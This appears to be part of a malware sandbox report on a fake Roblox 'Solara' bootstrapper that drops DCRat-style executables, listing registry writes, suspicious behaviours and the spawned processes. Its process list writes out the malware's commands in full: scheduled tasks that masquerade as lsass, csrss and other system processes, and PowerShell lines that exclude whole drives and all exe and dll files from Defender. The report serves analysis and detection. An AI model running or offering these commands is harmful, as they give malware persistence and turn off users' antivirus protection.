| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\csrss.exe | N/A |
| N/A | N/A | C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe | N/A |
| N/A | N/A | C:\winNet\wscript.exe.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\Youtube.exe
"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
"C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"
C:\Users\Admin\AppData\Local\Temp\Result.exe
"C:\Users\Admin\AppData\Local\Temp\Result.exe"
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\Frage build.exe
"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
C:\Users\Admin\AppData\Local\Temp\solara.exe
"C:\Users\Admin\AppData\Local\Temp\solara.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 8 /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 9 /tr "'C:\winNet\Bloxstrap.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 10 /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\All Users\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 6 /tr "'C:\winNet\lsm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\winNet\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\winNet\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\winNet\wscript.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\winNet\wscript.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\winNet\wscript.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\Refcrt.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Bloxstrap.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\lsm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\wscript.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\de-DE\WmiPrvSE.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KAuKjb5uOJ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\SysWOW64\msiexec.exe
"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\MsiExec.exe
C:\Windows\system32\MsiExec.exe -Embedding 85A41532DC1B4ED986F185DC47A3340F
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 9924FCA711D0C7FDDBC022E9B16DDBDF
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 1548
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\winNet\lsass.exe'" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\winNet\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\winNet\lsass.exe'" /rl HIGHEST /f
